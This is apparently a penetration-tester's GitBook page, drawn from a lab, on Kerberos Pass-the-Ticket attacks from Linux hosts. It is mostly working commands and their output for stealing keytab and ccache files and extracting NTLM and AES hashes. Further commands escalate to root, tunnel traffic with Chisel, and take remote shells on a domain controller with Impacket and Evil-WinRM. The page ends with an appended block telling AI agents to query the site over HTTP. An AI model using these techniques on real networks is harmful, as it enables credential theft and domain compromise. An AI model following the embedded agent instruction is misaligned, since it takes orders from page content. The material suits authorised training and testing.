# Pass the Ticket (PtT) - Linux ## Check If Linux Machine is Domain Joined ### **realm** ```shell-session david@inlanefreight.htb@linux01:~$ realm list inlanefreight.htb type: kerberos realm-name: INLANEFREIGHT.HTB domain-name: inlanefreight.htb configured: kerberos-member server-software: active-directory client-software: sssd required-package: sssd-tools required-package: sssd required-package: libnss-sss required-package: libpam-sss required-package: adcli required-package: samba-common-bin login-formats: %U@inlanefreight.htb login-policy: allow-permitted-logins permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb permitted-groups: Linux Admins ``` ### **PS** ```shell-session $ ps -ef | grep -i "winbind\|sssd" root 2140 1 0 Sep29 ? 00:00:01 /usr/sbin/sssd -i --logger=files root 2141 2140 0 Sep29 ? 00:00:08 /usr/libexec/sssd/sssd_be --domain inlanefreight.htb --uid 0 --gid 0 --logger=files root 2142 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files root 2143 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files ``` ## Finding Kerberos Tickets in Linux ### **Using Find to Search for Files with Keytab in the Name** ```shell-session $ find / -name *keytab* -ls 2>/dev/null 131610 4 -rw------- 1 root root 1348 Oct 4 16:26 /etc/krb5.keytab 262169 4 -rw-rw-rw- 1 root root 216 Oct 12 15:13 /opt/specialfiles/carlos.keytab ``` To use a keytab file, we must have read and write (rw) privileges on the file. ### **Identifying Keytab Files in Cronjobs** ```shell-session $ crontab -l # Edit this file to introduce tasks to be run by cron. # # # m h dom mon dow command *5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh $ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh #!/bin/bash kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt ``` ## Finding ccache Files ### **Reviewing Environment Variables for ccache Files.** ```shell-session $ env | grep -i krb5 KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh ``` ### **Searching for ccache Files in /tmp** ```shell-session $ ls -la /tmp total 68 drwxrwxrwt 13 root root 4096 Oct 6 16:38 . drwxr-xr-x 20 root root 4096 Oct 6 2021 .. -rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 16:38 krb5cc_647401106_tBswau -rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 15:23 krb5cc_647401107_Gf415d -rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 6 15:43 krb5cc_647402606_qd2Pfh ``` ## Abusing KeyTab Files ### **Listing keytab File Information** ```shell-session $ klist -k -t /opt/specialfiles/carlos.keytab Keytab name: FILE:/opt/specialfiles/carlos.keytab KVNO Timestamp Principal ---- ------------------- ------------------------------------------------------ 1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB ``` `klist` Not found: `sudo apt-get install krb5-user` ### **Impersonating a User with a keytab** ```shell-session $ klist Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu Default principal: david@INLANEFREIGHT.HTB Valid starting Expires Service principal 10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB renew until 10/07/22 17:02:11 $ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab $ klist Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu Default principal: carlos@INLANEFREIGHT.HTB Valid starting Expires Service principal 10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB renew until 10/07/22 17:16:11 ``` ### **Connecting to SMB Share as another user** ```shell-session $ smbclient //dc01/carlos -k -c ls . D 0 Thu Oct 6 14:46:26 2022 .. D 0 Thu Oct 6 14:46:26 2022 carlos.txt A 15 Thu Oct 6 14:46:54 2022 7706623 blocks of size 4096. 4452852 blocks available ``` ### Keytab Extract {% embed url="" %} We were able to impersonate Carlos using the account's tickets to read a shared folder in the domain, but if we want to gain access to his account on the Linux machine, we'll need his password. We can attempt to crack the account's password by extracting the hashes from the keytab file. Let's use [KeyTabExtract](https://github.com/sosdave/KeyTabExtract), a tool to extract valuable information from 502-type .keytab files, which may be used to authenticate Linux boxes to Kerberos. #### **1. Extracting Keytab Hashes with KeyTabExtract** ```shell-session $ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : INLANEFREIGHT.HTB SERVICE PRINCIPAL : carlos/ NTLM HASH : a738f92b3c08b424ec2d99589a9cce60 AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4 ``` With the NTLM hash, we can perform a [Pass the Hash (PtH) attack](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md). With the AES256 or AES128 hash, we can forge our tickets using [Rubeus](/0xss0rz/pentest/tools/rubeus.md) or attempt to [crack the hashes](/0xss0rz/pentest/cracking/hashes.md) to obtain the plaintext password. {% embed url="" %} {% embed url="" %} #### **2. Log in as Carlos** ```shell-session $ su - carlos@inlanefreight.htb Password: $ klist Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA Default principal: carlos@INLANEFREIGHT.HTB Valid starting Expires Service principal 10/07/2022 11:01:13 10/07/2022 21:01:13 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB renew until 10/08/2022 11:01:13 ``` ## Abusing Keytab ccache To abuse a ccache file, all we need is read privileges on the file. These files, located in `/tmp`, can only be read by the user who created them, but if we gain root access, we could use them. ## **Privilege Escalation to Root** {% content-ref url="/pages/37xjPkedNQqNbSue9Xs9" %} [Privilege Escalation](/0xss0rz/pentest/privilege-escalation.md) {% endcontent-ref %} ```shell-session $ ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222 svc_workstations@inlanefreight.htb@10.129.204.23's password: Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64) ...SNIP... svc_workstations@inlanefreight.htb@linux01:~$ sudo -l [sudo] password for svc_workstations@inlanefreight.htb: Matching Defaults entries for svc_workstations@inlanefreight.htb on linux01: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User svc_workstations@inlanefreight.htb may run the following commands on linux01: (ALL) ALL svc_workstations@inlanefreight.htb@linux01:~$ sudo su root@linux01:/home/svc_workstations@inlanefreight.htb# whoami root ``` ### **Looking for ccache Files** ```shell-session ls -la /tmp total 76 drwxrwxrwt 13 root root 4096 Oct 7 11:35 . drwxr-xr-x 20 root root 4096 Oct 6 2021 .. -rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_HRJDux -rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_qMKxc6 -rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 10:43 krb5cc_647401107_O0oUWh -rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct 7 11:21 krb5cc_647401109_D7gVZF -rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Oct 7 11:35 krb5cc_647402606 -rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 7 11:01 krb5cc_647402606_ZX6KFA ``` ### **Identifying Group Membership with the id Command** ```shell-session # id julio@inlanefreight.htb uid=647401106(julio@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb),647400512(domain admins@inlanefreight.htb),647400572(denied rodc password replication group@inlanefreight.htb) ``` Julio is a member of the `Domain Admins` group. ### Use a ccache file ``` # echo "" | base64 -d > krb5cc.florence.ramirez # export KRB5CCNAME=krb5cc.florence.ramirez # nxc smb domain.htb -u florence.ramirez --use-kcache SMB 10.10.11.24 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False) SMB 10.10.11.24 445 DC01 [+] domain.htb\florence.ramirez from ccache ``` To use a ccache file, we can copy the ccache file and assign the file path to the `KRB5CCNAME` variable. ```shell-session root@linux01:~# klist klist: No credentials cache found (filename: /tmp/krb5cc_0) root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 . root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133 root@linux01:~# klist Ticket cache: FILE:/root/krb5cc_647401106_I8I133 Default principal: julio@INLANEFREIGHT.HTB Valid starting Expires Service principal 10/07/2022 13:25:01 10/07/2022 23:25:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB renew until 10/08/2022 13:25:01 root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass $Recycle.Bin DHS 0 Wed Oct 6 17:31:14 2021 Config.Msi DHS 0 Wed Oct 6 14:26:27 2021 Documents and Settings DHSrn 0 Wed Oct 6 20:38:04 2021 john D 0 Mon Jul 18 13:19:50 2022 julio D 0 Mon Jul 18 13:54:02 2022 pagefile.sys AHS 738197504 Thu Oct 6 21:32:44 2022 PerfLogs D 0 Fri Feb 25 16:20:48 2022 Program Files DR 0 Wed Oct 6 20:50:50 2021 Program Files (x86) D 0 Mon Jul 18 16:00:35 2022 ProgramData DHn 0 Fri Aug 19 12:18:42 2022 SharedFolder D 0 Thu Oct 6 14:46:20 2022 System Volume Information DHS 0 Wed Jul 13 19:01:52 2022 tools D 0 Thu Sep 22 18:19:04 2022 Users DR 0 Thu Oct 6 11:46:05 2022 Windows D 0 Wed Oct 5 13:20:00 2022 7706623 blocks of size 4096. 4447612 blocks available ``` ## Using Linux Attack Tools with Kerberos In this scenario, our attack host doesn't have a connection to the `KDC/Domain Controller`, and we can't use the Domain Controller for name resolution. To use Kerberos, we need to proxy our traffic via `MS01` with a tool such as [Chisel](https://github.com/jpillora/chisel) and [Proxychains](https://github.com/haad/proxychains) and edit the `/etc/hosts` file to hardcode IP addresses of the domain and the machines we want to attack. Easier with Ligolo-NG {% content-ref url="/pages/vp8a38ukauPNVrWUQzpY" %} [Pivot, Tunneling and Port Forwarding](/0xss0rz/pentest/post-exploitation/pivot-tunneling-and-port-forwarding.md) {% endcontent-ref %} ### Transfer ccache file #### **Host File Modified** ```shell-session 0xss0rz@htb[/htb]$ cat /etc/hosts # Host addresses 172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01 172.16.1.5 ms01.inlanefreight.htb ms01 ``` We need to modify our proxychains configuration file to use socks5 and port 1080. #### **Proxychains Configuration File** ```shell-session 0xss0rz@htb[/htb]$ cat /etc/proxychains.conf [ProxyList] socks5 127.0.0.1 1080 ``` #### **Download Chisel to our Attack Host** ```shell-session 0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz 0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz 0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel 0xss0rz@htb[/htb]$ sudo ./chisel server --reverse 2022/10/10 07:26:15 server: Reverse tunneling enabled 2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM= 2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080 ``` Connect to `MS01` via RDP and execute chisel (located in C:\Tools). #### **Connect to MS01 with xfreerdp** ```shell-session 0xss0rz@htb[/htb]$ xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution ``` #### **Execute chisel from MS01** ```cmd-session C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks 2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080 2022/10/10 06:34:20 client: Connected (Latency 125.6177ms) ``` Finally, we need to transfer Julio's ccache file from `LINUX01` and create the environment variable `KRB5CCNAME` with the value corresponding to the path of the ccache file. ### **Setting the KRB5CCNAME Environment Variable** ```shell-session 0xss0rz@htb[/htb]$ export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133 ``` ### Impacket To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option `-k`. If we get a prompt for a password, we can also include the option `-no-pass`. **Using Impacket with proxychains and Kerberos Authentication** ```shell-session 0xss0rz@htb[/htb]$ proxychains impacket-wmiexec dc01 -k [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... INLANEFREIGHT.HTB:88 ... OK [*] SMBv3.0 dialect used [proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... INLANEFREIGHT.HTB:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:50713 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... INLANEFREIGHT.HTB:88 ... OK [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami inlanefreight\julio ``` ### Evil-WinRM {% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %} [Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md) {% endcontent-ref %} **Using Evil-WinRM with Kerberos** ```shell-session 0xss0rz@htb[/htb]$ proxychains evil-winrm -i dc01 -r inlanefreight.htb [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 Evil-WinRM shell v3.3 Warning: Remote path completions are disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint [proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK *Evil-WinRM* PS C:\Users\julio\Documents> whoami ; hostname inlanefreight\julio DC01 ``` ## Miscellaneous If we want to use a `ccache file` in Windows or a `kirbi file` in a Linux machine, we can use [impacket-ticketConverter](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py) to convert them. To use it, we specify the file we want to convert and the output filename. Let's convert Julio's ccache file to kirbi. ### **Impacket Ticket Converter** {% embed url="" %} or `git clone https://github.com/zer1t0/ticket_converter.git` - See Zephyr WU ```shell-session 0xss0rz@htb[/htb]$ impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] converting ccache to kirbi... [+] done ``` We can do the reverse operation by first selecting a `.kirbi file`. Let's use the `.kirbi` file in Windows. ### **Importing Converted Ticket into Windows Session with Rubeus** ```cmd-session C:\htb> C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbi ``` ## Linikatz {% embed url="" %} Just like `Mimikatz`, to take advantage of Linikatz, we need to be root on the machine. This tool will extract all credentials, including Kerberos tickets, from different Kerberos implementations such as FreeIPA, SSSD, Samba, Vintella, etc. Once it extracts the credentials, it places them in a folder whose name starts with `linikatz.`. Inside this folder, you will find the credentials in the different available formats, including ccache and keytabs. ```shell-session $ wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh $ /opt/linikatz.sh ``` ### V2 {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-ticket-ptt-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.